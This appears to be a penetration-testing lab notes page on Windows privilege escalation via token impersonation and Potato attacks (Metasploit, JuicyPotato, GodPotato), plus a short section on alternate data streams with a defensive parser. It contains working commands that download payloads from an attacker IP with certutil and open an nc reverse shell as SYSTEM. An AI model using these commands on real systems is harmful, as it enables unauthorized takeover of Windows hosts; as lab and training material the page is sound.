# Impersonation and Potato Attacks

## Token Impersonation Overview

[Token impersonation explained](/active-directory/post-compromise-attacks/token-impersonation.md)

<figure><img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""><figcaption><p>HTB Machine Jeeves</p></figcaption></figure>

{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop-impersonation-privileges" %}

## Potato Attack Overview

<figure><img src="/files/kSOCeuSTpVJz0qPxv6FY" alt=""><figcaption><p>High-level overview from foxglovesecurity</p></figcaption></figure>

## Escalation via Potato Attack

After getting a **meterpreter** shell (pick an LPORT different from the one used by the first shell):

```bash
background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738
exploit
```

Inside the new **meterpreter** shell:

```bash
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
```

## Manual Juicy Potato Attack

```
cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"
```

### GodPotato

```
godpotato.exe -cmd "cmd /c whoami"
.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"
```

## Resources

{% embed url="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" %}

{% embed url="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/" %}
Technical Overview
{% endembed %}

{% embed url="https://github.com/ohpe/juicy-potato" %}
Other Version
{% endembed %}

{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato" %}

## Bonus

### Alternate Data Streams

Alternate data streams (ADS) are an NTFS-only file attribute. The regular (unnamed) data stream holds the file's primary content; an alternate stream is a named secondary stream attached to the same file, which makes it a way to hide information inside a file.

```
dir /r
more hm.txt:root.txt:$DATA
```
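For triage of `dir /r` output collected from a host, the following added example (not from the original page) parses the stream lines into file/stream/size records and filters out the `Zone.Identifier` stream, which Windows writes to downloaded files and which is expected rather than a hiding technique. The sample listing is constructed for this demo; only the `hm.txt:root.txt` name comes from the page.

```python
import re
from typing import List, NamedTuple

# Constructed sample of `dir /r` output: the file name mirrors the page's
# example, but the directory, dates and sizes are made up for this demo.
SAMPLE_DIR_R = """\
 Directory of C:\\Users\\demo\\Documents

11/03/2017  11:47 PM    <DIR>          .
11/03/2017  11:47 PM    <DIR>          ..
11/03/2017  11:46 PM                 0 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/05/2017  09:12 AM            24,576 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               2 File(s)         24,576 bytes
               2 Dir(s)   7,157,911,552 bytes free
"""

# dir /r lists each named stream on its own indented line as
# "<size> <file>:<stream>:$DATA"; file names may contain spaces, so the
# stream name is anchored on the ":$DATA" suffix rather than on whitespace.
STREAM_LINE = re.compile(r"^\s+(?P<size>\d[\d,]*)\s+(?P<file>.+):(?P<stream>[^:]+):\$DATA\s*$")

# Zone.Identifier is the Mark-of-the-Web stream Windows adds to downloaded
# files; it is expected on many files and is not by itself a sign of hiding.
BENIGN_STREAMS = {"Zone.Identifier"}

class Stream(NamedTuple):
    file: str
    stream: str
    size: int

def parse_streams(dir_output: str) -> List[Stream]:
    """Return every named alternate data stream listed in `dir /r` output."""
    found = []
    for line in dir_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            found.append(Stream(m["file"], m["stream"], int(m["size"].replace(",", ""))))
    return found

def suspicious_streams(dir_output: str) -> List[Stream]:
    """Drop well-known benign streams so only unexpected ADS remain for review."""
    return [s for s in parse_streams(dir_output) if s.stream not in BENIGN_STREAMS]

if __name__ == "__main__":
    for s in suspicious_streams(SAMPLE_DIR_R):
        print(f"{s.file}:{s.stream} ({s.size} bytes) -> view with: more {s.file}:{s.stream}:$DATA")
```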

{% embed url="https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" %}

